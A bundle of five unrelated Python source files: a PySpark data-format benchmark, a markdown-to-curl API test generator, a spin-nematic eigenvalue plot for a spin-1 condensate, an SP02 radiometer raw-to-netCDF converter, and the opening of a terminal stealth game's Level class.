# https://www.kaggle.com/netflix-inc/netflix-prize-data
import time
import argparse
import pyspark
from pyspark.sql import SparkSession
import os
import s3fs
def groupby(sdf):
    """Group the dataframe by the `rating` column and count rows per group."""
    grouped = sdf.groupBy("rating")
    return grouped.count()
def stats(sdf, field="rating"):
    """Return the (max, min, count) aggregates of `field` as three dataframes."""
    maximum = sdf.agg({field: "max"})
    minimum = sdf.agg({field: "min"})
    row_count = sdf.agg({field: "count"})
    return maximum, minimum, row_count
def random_batch(sdf):
    """Collect a ~5% random sample (without replacement) to the driver."""
    sampled = sdf.sample(False, 0.05)
    return sampled.collect()
def distinct(sdf):
    """Count the number of distinct rows in the dataframe."""
    deduplicated = sdf.distinct()
    return deduplicated.count()
def filtering(sdf, date="2005-11-15"):
    """Count rows whose `date` column is strictly after the given date."""
    mask = sdf.date > date
    return sdf.filter(mask).count()
def get_op(op):
    """Look up a benchmark operation by name; returns None for unknown names."""
    operations = {
        "stats": stats,
        "random_batch": random_batch,
        "distinct": distinct,
        "filtering": filtering,
        "groupby": groupby,
    }
    return operations.get(op)
def read(fmt, spark):
    """Load the Netflix dataset from S3 in the requested format.

    Parameters
    ----------
    fmt : str
        One of "json", "csv", "avro", "parquet", "orc".
    spark : SparkSession
        Active session used to read the data.

    Returns
    -------
    pyspark.sql.DataFrame

    Raises
    ------
    ValueError
        For an unsupported format (previously this fell through and crashed
        with UnboundLocalError on the return).
    """
    json_data_path = "s3a://pengfei/sspcloud-demo/data_format/netflix.json"
    parquet_data_path = "s3a://pengfei/sspcloud-demo/data_format/netflix.parquet"
    avro_data_path = "s3a://pengfei/sspcloud-demo/data_format/netflix.avro"
    orc_data_path = "s3a://pengfei/sspcloud-demo/data_format/netflix.orc"
    csv_data_path = "s3a://pengfei/sspcloud-demo/data_format/netflix.csv"
    if fmt == "json":
        sdf = spark.read.option("header", "true").json(json_data_path)
    elif fmt == "csv":
        sdf = spark.read.option("header", "true").csv(csv_data_path)
    elif fmt == "avro":
        # avro needs the external spark-avro package (see spark-submit line above).
        sdf = spark.read.format("avro").option("header", "true").load(avro_data_path)
    elif fmt == "parquet":
        sdf = spark.read.option("header", "true").parquet(parquet_data_path)
    elif fmt == "orc":
        # Bug fix: orc_data_path existed but there was no branch reading it,
        # even though write() and the benchmark comments support orc.
        sdf = spark.read.option("header", "true").orc(orc_data_path)
    else:
        raise ValueError("Unsupported format: {}".format(fmt))
    return sdf
def write(sdf, fmt, name="generated-nf"):
    """Rename the raw columns and persist the dataframe as `<name>.<fmt>`."""
    renamed = (
        sdf.withColumnRenamed("_c0", "user_id")
        .withColumnRenamed("_c1", "rating")
        .withColumnRenamed("_c2", "date")
    )
    target = "{}.{}".format(name, fmt)
    if fmt == "json":
        renamed.write.option("header", "true").json(target)
    elif fmt == "csv":
        renamed.write.option("header", "true").csv(target)
    elif fmt == "avro":
        renamed.write.format("avro").option("header", "true").save(target)
    elif fmt == "parquet":
        renamed.write.option("header", "true").parquet(target)
    elif fmt == "orc":
        renamed.write.option("header", "true").orc(target)
    else:
        print("Can't find matched format. Stop spark")
def mute_spark_logs(sc):
    """Silence Spark's INFO chatter by raising the org/akka loggers to ERROR."""
    log4j = sc._jvm.org.apache.log4j
    error_level = log4j.Level.ERROR
    for logger_name in ("org", "akka"):
        log4j.LogManager.getLogger(logger_name).setLevel(error_level)
if __name__ == "__main__":
    # CLI: fmt = output format (json/csv/avro/parquet/orc), op = benchmark op
    # name (see get_op); op is only used in the commented-out benchmark line.
    parser = argparse.ArgumentParser()
    parser.add_argument("fmt", type=str)
    parser.add_argument("op", type=str)
    args = parser.parse_args()

    # Sanity-check S3 connectivity before spinning up Spark.
    endpoint = "https://" + os.environ['AWS_S3_ENDPOINT']
    fs = s3fs.S3FileSystem(client_kwargs={'endpoint_url': endpoint})
    fs.info('pengfei/pengfei_test')

    # Spark-on-Kubernetes session with the spark-avro package on the classpath.
    spark = SparkSession.builder.master("k8s://https://kubernetes.default.svc:443").appName("Evaluate data format") \
        .config("spark.kubernetes.container.image", "inseefrlab/jupyter-datascience:master") \
        .config("spark.kubernetes.authenticate.driver.serviceAccountName", os.environ['KUBERNETES_SERVICE_ACCOUNT']) \
        .config("spark.executor.instances", "5") \
        .config("spark.kubernetes.namespace", os.environ['KUBERNETES_NAMESPACE']) \
        .config("spark.jars.packages", "org.apache.spark:spark-avro_2.12:3.0.1") \
        .getOrCreate()
    mute_spark_logs(spark.sparkContext)

    # Always read the CSV source, then time writing it in the requested format.
    sdf = read("csv", spark)
    sdf.show(5)
    start = time.time()
    write(sdf, args.fmt)
    # get_op(args.op)(sdf)
    print("{}, {}, {}".format(args.fmt, args.op, time.time() - start))
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import sys
import os
import re
import json
import random
# Python 2 only: re-expose sys.setdefaultencoding (hidden at interpreter
# startup) so the UTF-8 markdown below decodes; this idiom does not exist in
# Python 3, where this whole file would need porting.
reload(sys)
sys.setdefaultencoding("utf8")
def endCase(turlFile, case):
    """Write one finished test case (curl command, optional request body and
    the expected response) to the .turl file."""
    pieces = ["curl -X", case["method"], " 'http://default-host", case["path"], "?1=1"]
    # Required parameters get a placeholder value appended to the query string.
    for param in case["params"]:
        if param["required"]:
            pieces.extend(["&", param["name"], "=1111111"])
    pieces.append("' -H 'Connection: keep-alive' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' -H 'Accept: application/json, text/plain, */*' -H 'Accept-Language: zh-CN' -H 'token: ...' -H 'Content-Type: application/json;charset=utf-8' -H 'Cookie: ...' --compressed --insecure")
    if case["req"] is not None:
        pieces.extend([" -d '", case["req"], "'"])
    pieces.extend(["\n\n", case["res"], "\n\n"])
    turlFile.write("".join(pieces) + "\n")
# Convert every API markdown document in the current directory into a .turl
# file of curl test cases, and build a master index (testcases.turl).
mainTURL = ""
mdFileNames = [fileName for fileName in os.listdir(".") if re.match(".*.md", fileName) and fileName != "README.md"]
for mdFileName in mdFileNames:
    # Index entry: section marker plus a pointer to the generated .turl file.
    mainTURL += "X " + mdFileName[:-3] + "\n\n(" + mdFileName[:-3] + ".turl)\n\n"
    mdFile = open(mdFileName)
    turlFile = open(mdFileName[:-3] + ".turl", "w")
    # Line-by-line state machine over the markdown:
    #   INIT -> AWAITING_MODULE -> AWAITING_CASE -> IN_CASE
    #   IN_CASE branches into AWAITING_REQ/IN_REQ (request JSON),
    #   AWAITING_PARAMS/IN_PARAMS (parameter table) and
    #   AWAITING_RES/IN_RES (response JSON), each returning to IN_CASE.
    state = "INIT"
    currentCase = None
    for line in mdFile.readlines():
        line = line.strip()
        if state == "INIT":
            # Skip everything before the first top-level heading.
            if line.startswith("# "):
                state = "AWAITING_MODULE"
        elif state == "AWAITING_MODULE":
            if line.startswith("# "):
                turlFile.write("X.X " + line[2:] + "\n")
                state = "AWAITING_CASE"
        elif state == "AWAITING_CASE":
            if line.startswith("## "):
                turlFile.write("X.X.X " + line[3:] + "\n")
                currentCase = { "req": None, "params": [] }
                state = "IN_CASE"
        elif state == "IN_CASE":
            if line.startswith("**"):
                # Bold markers (Chinese): 接口地址 = endpoint path, 请求方式 =
                # HTTP method, 请求示例 = request example, 请求参数 = request
                # parameters, 响应示例 = response example.
                if line.startswith("**接口地址**"):
                    currentCase["path"] = line[line.find("`") + 1:-1]
                elif line.startswith("**请求方式**"):
                    currentCase["method"] = line[line.find("`") + 1:-1]
                elif line.startswith("**请求示例**"):
                    state = "AWAITING_REQ"
                elif line.startswith("**请求参数**"):
                    state = "AWAITING_PARAMS"
                elif line.startswith("**响应示例**"):
                    state = "AWAITING_RES"
            elif line.startswith("# "):
                # A new module begins: flush the case that is currently open.
                endCase(turlFile, currentCase)
                currentCase = None
                turlFile.write("X.X " + line[2:] + "\n")
                state = "AWAITING_CASE"
            elif line.startswith("## "):
                # A new case begins: flush the current one first.
                endCase(turlFile, currentCase)
                currentCase = None
                turlFile.write("X.X.X " + line[3:] + "\n")
                currentCase = { "req": None, "params": [] }
                state = "IN_CASE"
        elif state == "AWAITING_REQ":
            if line.startswith("{") or line.startswith("["):
                currentCase["req"] = line
                state = "IN_REQ"
        elif state == "IN_REQ":
            # Accumulate the JSON body until the closing code fence.
            if line.startswith("`"):
                state = "IN_CASE"
            else:
                currentCase["req"] += line
        elif state == "AWAITING_PARAMS":
            if line.startswith("| -"):
                state = "IN_PARAMS"
            elif line == "暂无":  # "none": the case has no parameters
                state = "IN_CASE"
        elif state == "IN_PARAMS":
            if len(line) < 1:
                # A blank line ends the markdown table.
                state = "IN_CASE"
            else:
                # Table columns: | name | description | in | required | type |
                paramParts = line.split("|")
                currentCase["params"].append({ "name": paramParts[1].replace(" ", ""), "in": paramParts[3], "required": paramParts[4] == "true", "type": paramParts[5] })
        elif state == "AWAITING_RES":
            if line.startswith("{") or line.startswith("["):
                currentCase["res"] = line
                state = "IN_RES"
        elif state == "IN_RES":
            if line.startswith("`"):
                state = "IN_CASE"
            else:
                currentCase["res"] += line
    # Flush the trailing case if the file ended while one was still open.
    if currentCase is not None:
        endCase(turlFile, currentCase)
        currentCase = None
    turlFile.close()
    mdFile.close()
# Write the master index that links all generated .turl files.
mainFile = open("testcases.turl", "w")
mainFile.write(mainTURL)
mainFile.close()
|
<reponame>mattWheeler1/spin-1<filename>diagnostics/plots/kibble-zurek/1d_spin-nematic_eigenvalues.py
import h5py
import numpy as np
import matplotlib.pyplot as plt
from numpy import conj
from numpy.fft import fft, ifft, ifftshift

# Plot the position-dependent eigenvalues of the spatially-correlated
# spin-nematic tensor Q for a 1D spin-1 condensate Kibble-Zurek run.

# Load in data
filename_prefix = '1d_polar-BA-FM_5000'
data_file = h5py.File('../../../data/1d_kibble-zurek/{}.hdf5'.format(filename_prefix), 'r')

# Loading grid array data:
x = data_file['grid/x'][...]
Nx = len(x)
dx = x[1] - x[0]
dkx = np.pi / (Nx / 2 * dx)
kx = np.arange(-Nx // 2, Nx // 2) * dkx
box_radius = int(np.ceil(np.sqrt(Nx ** 2) / 2) + 1)
center_x = Nx // 2
time = data_file['time/t'][:, 0]

# Generate figure
fig, ax = plt.subplots()
# ax.set_ylim(0, 1.1)
ax.set_ylabel(r'$\lambda_Q (r)$')
ax.set_xlabel(r'$x / \xi_s$')

# Loading wavefunction data (final time slice only)
psi_plus = data_file['wavefunction/psi_plus'][:, -1]
psi_0 = data_file['wavefunction/psi_0'][:, -1]
psi_minus = data_file['wavefunction/psi_minus'][:, -1]

# Calculate densities
n_plus = abs(psi_plus) ** 2
n_0 = abs(psi_0) ** 2
n_minus = abs(psi_minus) ** 2
n = n_plus + n_0 + n_minus

# Fourier transforms of the nematic tensor components.
Q_xx = fft(np.real(conj(psi_plus) * psi_minus) - 0.5 * (n_plus + n_minus) + n / 3)
Q_yy = fft(-np.real(conj(psi_plus) * psi_minus) - 0.5 * (n_plus + n_minus) + n / 3)
Q_zz = fft(-n_0 + n / 3)
Q_xy = fft(np.imag(conj(psi_plus) * psi_minus))
# Bug fix: the original conj(psi_minus - psi_minus) is identically zero and
# conj(psi_minus + psi_minus) = 2*conj(psi_minus); by symmetry with the
# accompanying (psi_minus -/+ psi_plus) factors these should read psi_plus.
Q_xz = fft(-np.sqrt(2.) / 4 * (psi_0 * conj(psi_minus - psi_plus) + conj(psi_0) * (psi_minus - psi_plus)))
Q_yz = fft(-1j * np.sqrt(2.) / 4 * (psi_0 * conj(psi_minus + psi_plus) - conj(psi_0) * (psi_minus + psi_plus)))

# Calculate Q_tilde: position-space correlations of the tensor components,
# computed via the convolution theorem (ifft of products of transforms).
Qt_xx = (1 / Nx * ifftshift(ifft(Q_xx * conj(Q_xx) + Q_xy * conj(Q_xy) + Q_xz * conj(Q_xz)))).real
Qt_xy = (1 / Nx * ifftshift(ifft(Q_xx * conj(Q_xy) + Q_xy * conj(Q_yy) + Q_xz * conj(Q_yz)))).real
Qt_xz = (1 / Nx * ifftshift(ifft(Q_xx * conj(Q_xz) + Q_xy * conj(Q_yz) + Q_xz * conj(Q_zz)))).real
Qt_yx = (1 / Nx * ifftshift(ifft(Q_xy * conj(Q_xx) + Q_yy * conj(Q_xy) + Q_yz * conj(Q_xz)))).real
Qt_yy = (1 / Nx * ifftshift(ifft(Q_xy * conj(Q_xy) + Q_yy * conj(Q_yy) + Q_yz * conj(Q_yz)))).real
Qt_yz = (1 / Nx * ifftshift(ifft(Q_xy * conj(Q_xz) + Q_yy * conj(Q_yz) + Q_yz * conj(Q_zz)))).real
Qt_zx = (1 / Nx * ifftshift(ifft(Q_xz * conj(Q_xx) + Q_yz * conj(Q_xy) + Q_zz * conj(Q_xz)))).real
Qt_zy = (1 / Nx * ifftshift(ifft(Q_xz * conj(Q_xy) + Q_yz * conj(Q_yy) + Q_zz * conj(Q_yz)))).real
Qt_zz = (1 / Nx * ifftshift(ifft(Q_xz * conj(Q_xz) + Q_yz * conj(Q_yz) + Q_zz * conj(Q_zz)))).real

# Diagonalize the 3x3 correlation matrix at every grid point.
eigenvalues_1 = []
eigenvalues_2 = []
eigenvalues_3 = []
eigenvector_1 = []
eigenvector_2 = []
eigenvector_3 = []
for index in range(Nx):
    # NOTE(review): np.matrix is deprecated; np.array would behave the same here.
    Qt = np.matrix([[Qt_xx[index], Qt_xy[index], Qt_xz[index]],
                    [Qt_yx[index], Qt_yy[index], Qt_yz[index]],
                    [Qt_zx[index], Qt_zy[index], Qt_zz[index]]])
    w, v = np.linalg.eig(Qt)
    # Bug fix: eigenvectors are the COLUMNS of v (v[:, i]); the original
    # appended rows (v[i]), which are not eigenvectors.
    eigenvalues_1.append(w[0])
    eigenvector_1.append(v[:, 0])
    eigenvalues_2.append(w[1])
    eigenvector_2.append(v[:, 1])
    eigenvalues_3.append(w[2])
    eigenvector_3.append(v[:, 2])

plt.plot(x, eigenvalues_1, 'ko')
plt.plot(x, eigenvalues_2, 'ro')
plt.plot(x, eigenvalues_3, 'bo')
# plt.savefig(f'../../../../plots/spin-1/{filename_prefix}_eigenvalue.png', bbox_inches='tight')
plt.ylim(0, 0.3)
plt.show()
|
# -*- coding: utf-8 -*-
import xarray as xr
import numpy as np
import pandas as pd
import pathlib
class BaselineDatabase(object):
    """In-memory lookup tables mapping (site, line, date) to the installed instrument."""

    def __init__(self):
        # One row per installation event.
        self.line_table = pd.DataFrame(columns=['site', 'install', 'line', 'instrument_id', 'comment'])
        # One row per physical instrument.
        self.instrument_table = pd.DataFrame(columns=['instrument_id', 'type_id', 'sn', 'config'])

    def add2line_table(self, site, install_datetime, line_id, instrument_id, comment=''):
        """Record that `instrument_id` was installed on `line_id` at `site` on `install_datetime`."""
        install_datetime = pd.to_datetime(install_datetime)
        new_entry = pd.DataFrame({'site': site, 'install': install_datetime, 'line': line_id,
                                  'instrument_id': instrument_id, 'comment': comment},
                                 index=[instrument_id])
        # pd.concat replaces the removed DataFrame.append (see history above).
        self.line_table = pd.concat([self.line_table, new_entry], ignore_index=True)
        return

    def addnewinstrument(self, instrument_id, type_id, sn, config):
        """Register an instrument: serial number plus its channel->wavelength config dict."""
        new_instrument = pd.DataFrame([[instrument_id, type_id, sn, config]],
                                      columns=['instrument_id', 'type_id', 'sn', 'config'],
                                      index=[instrument_id])
        self.instrument_table = pd.concat([self.instrument_table, new_instrument])
        return

    def get_instrument(self, site, line, date):
        """Return the instrument row installed on `line` at `site` as of `date`.

        Raises
        ------
        IndexError
            If no installation on that site/line predates `date`.
        """
        lt_site_line = self.line_table[np.logical_and(self.line_table.site == site,
                                                      self.line_table.line == line)]
        previous_installs = lt_site_line[lt_site_line.install <= date]
        if previous_installs.shape[0] == 0:
            # Bug fix: the original message had an unbalanced parenthesis.
            raise IndexError(f'Instrument not installed (line:{line}, site: {site}, date: {date})')
        # Sort by install date so the most recent install is returned even if
        # entries were added to the table out of chronological order.
        lt_found = previous_installs.sort_values('install').iloc[-1]
        instrument_found = self.instrument_table[self.instrument_table.instrument_id == lt_found.instrument_id].iloc[0]
        return instrument_found
# Module-level singleton describing the SP02 installation history used by
# read_file()/convert_raw2nc() below.
database = BaselineDatabase()

#### filter comfigurations
# Channel letter -> filter center wavelength (nm) for the two SP02 configs.
conf_1= {'A': 368, 'B': 1050, 'C': 610, 'D': 778}
conf_2= {'A': 412, 'B': 500, 'C': 675, 'D': 862}

#### Instruments
# addnewinstrument(instrument_id, type_id, serial_no, filter_config)
database.addnewinstrument(1,1,1032,conf_2)
database.addnewinstrument(2,1,1046,conf_1)
database.addnewinstrument(3,1,1022,conf_2)

#### instrument linups
# Installation history at MLO: instruments 1 and 2 are swapped between data
# lines 121 and 221 roughly once a year (presumably for calibration — verify).
installdate = '20131126'
database.add2line_table('mlo', installdate, 121, 2)
database.add2line_table('mlo', installdate, 221, 1)
installdate = '20140104' # something is statring to go wrong on that day!
database.add2line_table('mlo', installdate, 121, 1)
database.add2line_table('mlo', installdate, 221, 2)
installdate = '20141204'
database.add2line_table('mlo', installdate, 121, 2)
database.add2line_table('mlo', installdate, 221, 1)
installdate = '20151203'
database.add2line_table('mlo', installdate, 121, 1)
database.add2line_table('mlo', installdate, 221, 2)
installdate = '20161211'
database.add2line_table('mlo', installdate, 121, 1)
database.add2line_table('mlo', installdate, 221, 2)
installdate = '20171207'
database.add2line_table('mlo', installdate, 121, 2)
database.add2line_table('mlo', installdate, 221, 1)
database.add2line_table('mlo', '20200205', 121, 1)
database.add2line_table('mlo', '20200205', 221, 2)
database.add2line_table('mlo', '20200620', 121, 2)
database.add2line_table('mlo', '20200620', 221, 1)
installdate = '20210204'
database.add2line_table('mlo', installdate, 121, 1)
database.add2line_table('mlo', installdate, 221, 2)
# # testing: installation in BRW...
# installdate = '20210318'
# uninstalldate = '20211008'
# database.add2line_table('brw', installdate, 121, 1)
# # database.add2line_table('brw', installdate, 101, 1)
# database.add2line_table('brw', installdate, 221, 2)
# database.add2line_table('brw', installdate, 221, 2)
installdate = '20220101'
database.add2line_table('mlo', installdate, 121, 1)
database.add2line_table('mlo', installdate, 221, 2)
installdate = '20220309'
database.add2line_table('mlo', installdate, 121, 3)
def get_lines_from_station_header(path='/nfs/grad/gradobs/documentation/station_headers/MLO_header.xlsx',
                                  line_ids=(121, 221)):
    """Parse the station-header spreadsheet and return column labels per data line.

    Parameters
    ----------
    path : str
        Excel file where each line-id marker row is preceded by a row of
        human-readable column headers.
    line_ids : iterable of int
        Data-line identifiers to look up (e.g. 121, 221 for the SP02s at MLO).
        Changed from a mutable list default to a tuple (best practice;
        callers passing a list still work).

    Returns
    -------
    list of dict
        One dict per line id with keys 'line_id' and 'column_labels'.
    """
    df = pd.read_excel(pathlib.Path(path))
    lines = []
    for line_id in line_ids:
        # Row index of the marker; the header row sits directly above it.
        idx = (df['Unnamed: 1'] == line_id).argmax()
        header = df.iloc[idx - 1].dropna().values[1:]
        lines.append(dict(line_id=line_id, column_labels=header))
    return lines
def read_file(path2raw, lines = None,
              # collabels = ['lineID', 'Year', 'DOY', 'HHMM', 'A', 'B', 'C', 'D','temp'],
              collabels = ['lineID', 'Year', 'DOY', 'HHMM'],
              database = None,
              site = None
              ):
    """
    Read raw SP02 logger file(s) and return one xarray.Dataset per data line.

    The particular way I am reading here allows for later implementation of
    reading old data from Longenecker. And also allows to read other raw files

    Parameters
    ----------
    path2raw : str, list, pathlib.Path
        Single or list of path(s) to file(s).
    lines : list, optional
        List of lines to consider (e.g. [121, 221] for sp02 at MLO). The default is None -> all.
    collabels : list of str, optional
        Labels for the leading metadata columns of the raw CSV.
        The default is ['lineID', 'Year', 'DOY', 'HHMM'].
    database : BaselineDatabase, optional
        Used to resolve which instrument was installed on each line at the
        file's first timestamp.
    site : str, optional
        DESCRIPTION. The default is None. If None the site is infered from the
        file path. Set if the path is not the standard path

    Returns
    -------
    out_list : list of xarray.Dataset
        Per line: raw channel voltages, internal temperature, channel
        wavelengths and instrument metadata.
    """
    out = {}
    collabels = np.array(collabels)

    # Accept a single path or a list; concatenate all files into one frame.
    if not isinstance(path2raw, list):
        path2raw = [path2raw,]
    df_all = pd.concat([pd.read_csv(p2r, header=None) for p2r in path2raw])

    # Label only the leading metadata columns; the rest stay numeric for now.
    colsis = df_all.columns.values
    colsis = [int(col) for col in colsis]
    # todo: assigne collumn labels accoreding to instrument info
    colsis[:collabels.shape[0]] = collabels
    df_all.columns = colsis

    # make datetime index from Year + day-of-year + zero-padded HHMM
    df_all['HHMM'] = df_all.apply(lambda row: f'{int(row.HHMM):04d}', axis=1)
    df_all.index = df_all.apply(lambda row: pd.to_datetime(f'{int(row.Year)}0101') + pd.to_timedelta(row.DOY - 1 , 'd') + pd.to_timedelta(int(row.HHMM[:2]), 'h') + pd.to_timedelta(int(row.HHMM[2:]), 'm'), axis=1)
    df_all.index.name = 'datetime'

    out['df_all'] = df_all.copy()
    out_list = []
    # The instrument lookup uses the FIRST timestamp of the whole file.
    date = df_all.index[0]
    for lid in df_all.lineID.unique():
        if isinstance(lines, list):
            if lid not in lines:
                print(f'{lid} not in lines ({lines})')
                continue
        df_lid = df_all[df_all.lineID == lid].copy()
        # there was the case that Longenecker must have created an overlab when stiching two days together ... therefor ->
        df_lid = df_lid[~df_lid.index.duplicated()]
        df_lid.sort_index(inplace=True)
        instrument = database.get_instrument(site, lid, date)
        df_lid = df_lid.drop(['lineID', 'Year','DOY', 'HHMM'], axis=1)
        # NOTE(review): assumes exactly five remaining columns (4 channels +
        # temperature) — confirm for non-SP02 line formats.
        df_lid.columns = ['A', 'B', 'C', 'D', 'temp']
        # replace invalid values with nan
        df_lid[df_lid == -99999] = np.nan
        df_lid[df_lid == -7999.0] = np.nan
        # seperate photo detector readings from temp
        df_temp = df_lid.temp
        df_voltages = df_lid.reindex(['A', 'B', 'C', 'D'], axis= 1)
        df_voltages.columns.name = 'channel'
        # create dataset
        ds = xr.Dataset()
        ds['raw_data'] = df_voltages
        ds['internal_temperature'] = df_temp
        ser = pd.Series(instrument.config)
        ser.index.name = 'channel'
        # (sic) variable name 'channle_wavelengths' is kept — downstream files
        # may already depend on it.
        ds['channle_wavelengths'] = ser
        ds['line_id'] = lid
        sn = instrument['sn']
        ds['serial_no'] = sn
        out_list.append(ds)
    return out_list
# for line in lines:
# lid = line['line_id']
# dft = df_all[df_all.lineID == lid].copy()
# dft = dft.dropna(axis = 1)
# # replace placeholder with correct column labels
# dft.columns = line['column_labels']
# line['df'] = dft.copy()
# # clean up the channel voltages
# df_channels = dft.drop(['lineID', 'Year', 'DOY', 'HHMM', 'SPO2 internal temp [degC]'], axis=1)
# channels = [int(col.split(' ')[2]) for col in df_channels.columns]
# df_channels.columns = channels
# # df_channels.columns.name = f'wavelength_lid{lid}'
# df_channels[df_channels == -99999] = np.nan
# df_channels[df_channels == -7999.0] = np.nan
# data_list.append(df_channels.copy())
# # clean up temp
# temp = dft['SPO2 internal temp [degC]'].copy()
# temp[temp == -99999] = np.nan
# temp[temp == -7999.0] = np.nan
# df_inst_temp[lid] = temp
# # print(len(channels))
# # print(channels)
# df_inst_channels[lid] = channels
# # line['raw_data'] = df_channels
# # ds[f'rawdata_line_id_{lid}'] = df_channels
# # ds[f'instrument_temperature_line_id_{lid}'] = temp
# # ds['line_ids'] = lines
# ds = xr.Dataset()
# data = pd.concat(data_list, axis=1).sort_index(axis=1)
# data.columns.name = 'channel_wavelength'
# ds['raw_data'] = data
# df_inst_temp.columns.name = 'line_id'
# ds['instrument_temperatures'] = df_inst_temp
# df_inst_channels.columns.name = 'line_id'
# df_inst_channels.index = [chr(ord('A') + i) for i in df_inst_channels.index]
# df_inst_channels.index.name = 'channel'
# ds['instrument_channels'] = df_inst_channels
# return ds
def convert_raw2nc(path2rawfolder='/nfs/grad/gradobs/raw/mlo/2020/', path2netcdf='/mnt/telg/data/baseline/mlo/2020/',
                   start_date='2020-02-06',
                   pattern='*sp02.*',
                   sernos=(1032, 1046),
                   site='mlo',
                   overwrite=False,
                   verbose=False,
                   raise_error=True,
                   test=False):
    """Convert raw SP02 files in a folder to per-instrument netCDF files.

    Parameters
    ----------
    path2rawfolder : str or pathlib.Path, optional
        Folder containing the raw files. The default is '/nfs/grad/gradobs/raw/mlo/2020/'.
    path2netcdf : str or pathlib.Path, optional
        Output folder (created if missing). The default is '/mnt/telg/data/baseline/mlo/2020/'.
    start_date : str, optional
        Files dated before this are skipped. The default is '2020-02-06'.
    pattern : str, optional
        Only files with this pattern are considered. In newer raw data
        versions this would be '*sp02.*'. In older ones: 'MLOD*'
    sernos : iterable of int, optional
        Instrument serial numbers expected in the data. Changed from a
        mutable list default to a tuple (never mutated; callers passing a
        list still work). The default is (1032, 1046).
    site : str, optional
        Site code used for the instrument lookup. The default is 'mlo'.
    overwrite, verbose : bool, optional
        Currently unused placeholders kept for interface stability.
    raise_error : bool, optional
        If False, files whose instrument cannot be resolved are skipped
        instead of raising.
    test : bool, optional
        If True only one file is processed. The default is False.

    Returns
    -------
    None (or a debug dict when `test` is True and a lookup fails).
    """
    path2rawfolder = pathlib.Path(path2rawfolder)
    path2netcdf = pathlib.Path(path2netcdf)
    try:
        path2netcdf.mkdir(exist_ok=True)
    except FileNotFoundError:
        # Parent missing too: create one level up, then the target.
        path2netcdf.parent.mkdir()
        path2netcdf.mkdir()

    file_list = list(path2rawfolder.glob(pattern))
    df_in = pd.DataFrame(file_list, columns=['path_in'])

    # Detect the raw-file naming scheme (old vs. new) from the first file.
    p2f = file_list[0]
    nl = p2f.name.split('.')
    if len(nl) == 2:
        # old format like /nfs/grad/gradobs/raw/mlo/2013/sp02/MLOD013A.113
        # -> date is the year folder plus the julian day embedded in the name.
        def path2date(path2file):
            year = path2file.parent.parent.name
            jul = int(''.join(filter(str.isdigit, path2file.name.split('.')[0])))
            date = pd.to_datetime(year) + pd.to_timedelta(jul - 1, 'd')
            return date
    else:
        # new format: gradobs.mlo-sp02.20200126.raw.dat
        path2date = lambda x: pd.to_datetime(x.name.split('.')[2])

    # Index by date, restrict to the requested range.
    df_in.index = df_in.path_in.apply(path2date)
    df_in.sort_index(inplace=True)
    df_in = df_in.truncate(before=start_date)

    # Expected output path for every (serial number, input file) pair.
    # NOTE(review): the output name hard-codes 'mlo' rather than using `site`;
    # left unchanged so existing file layouts keep working — confirm intent.
    df_out = pd.DataFrame(columns=['path_out'])
    for sn in sernos:
        for idx, row in df_in.iterrows():
            date = idx
            fnnc = f'gradobs.mlo.sp02.sn{sn}.{date.year}{date.month:02d}{date.day:02d}.raw.nc'
            path2netcdf_file = path2netcdf.joinpath(fnnc)
            df_add = pd.DataFrame({'path_in': row.path_in, 'path_out': path2netcdf_file}, index=[idx])
            # Bug fix: DataFrame.append was removed in pandas 2.0; use concat
            # (consistent with BaselineDatabase above).
            df_out = pd.concat([df_out, df_add])

    # Process only files whose output does not exist yet.
    df_out['exists'] = df_out.path_out.apply(lambda x: x.is_file())
    df_work = df_out[~df_out.exists]
    work_array = df_work.path_in.unique()
    print(f'No of files that need to be processed: {len(work_array)}')

    for e, file in enumerate(work_array):
        df_sel = df_work[df_work.path_in == file]
        try:
            dslist = read_file(file, database=database, site=site)
        except IndexError:
            # Raised by BaselineDatabase.get_instrument when no installation
            # predates the file's first timestamp.
            if raise_error:
                raise
            else:
                print('Instrument not installed ... skip', end='...')
                if test:
                    return {'file': file, 'database': database}
                else:
                    continue
        # One dataset per data line -> one netCDF file per serial number.
        for ds in dslist:
            sn = str(ds.serial_no.values)
            try:
                path2netcdf_file = [p2fo for p2fo in df_sel.path_out.values if sn in p2fo.name][0]
            except IndexError:
                assert(False), 'This Error is usually caused because one of the netcdf files (for a serial number) is deleted, but not the other.'
            ds.to_netcdf(path2netcdf_file)
        if test:
            break

    if not test:
        # Sanity check: after a full run every expected output must exist.
        df_out['exists'] = df_out.path_out.apply(lambda x: x.is_file())
        df_work = df_out[~df_out.exists]
        work_array = df_work.path_in.unique()
        assert(df_work.shape[0] == 0), f'df_work should be empty at the end. Still has {df_work.shape[0]} entries.'
    return
|
from typing import Any, Iterable, Optional, Type
from blessed import Terminal
from pydantic import BaseModel
from app import constants as const
from app.actions import Action, Move, action_from_str
from app.entities import Exit, MovingWall, Patrol, PatrolVision, Player, Wall
from app.types.events import Event
from app.types.hitbox import HitBox
from app.types.state import LevelState
from app.windows.cmd_help import CmdHelpWindow
from app.windows.cmd_list import CmdListwindow
from app.windows.map import MapWindow
from app.windows.user_input import UserInputWindow
class Level(BaseModel):
    """All components needed to track state and render a level"""

    # --- static level definition ---
    title: str
    number: int
    max_commands: int  # command budget shown in the command-list window
    description: str
    player: Player
    entities: list  # walls, moving walls, patrols, exits, ... (mixed entity types)
    allowed_commands: list[Type[Action]]
    # --- mutable runtime state ---
    # Maps a time step to the LevelState entered at that step.  Pydantic
    # copies field defaults per instance, so this mutable default is not
    # shared between Level instances.
    state: dict[int, LevelState] = {0: LevelState.Planning}
    current_input: str = ""  # text typed so far in the user-input window
    current_time: int = 0  # advanced by map_sequence during playback
    term: Optional[Any] = None  # blessed.Terminal; typed Any to satisfy pydantic

    @property
    def current_state(self) -> LevelState:
        """Get current state based on current time"""
        return self.state.get(self.current_time, LevelState.Planning)

    @property
    def map_initial(self) -> MapWindow:
        """Generate the initial map window (all entities at time 0)"""
        entity_boxes = self.get_boxes_at(0)
        return MapWindow(
            level_name=self.title, level_number=self.number, boxes=entity_boxes
        )

    def get_boxes_at(self, time: int) -> Iterable[HitBox]:
        """Get all hitboxes for a given time.

        Yields the player's box, every patrol's in-bounds vision boxes, and
        each entity's own in-bounds box.
        """
        yield self.player.get_hitbox_at(time)
        for e in self.entities:
            if isinstance(e, Patrol):
                # Patrols also project vision cells that can spot the player.
                for v in e.get_current_vision(time):
                    box = v.get_hitbox_at(time)
                    if box.in_bounds:
                        yield box
            box = e.get_hitbox_at(time)
            if box.in_bounds:
                yield box

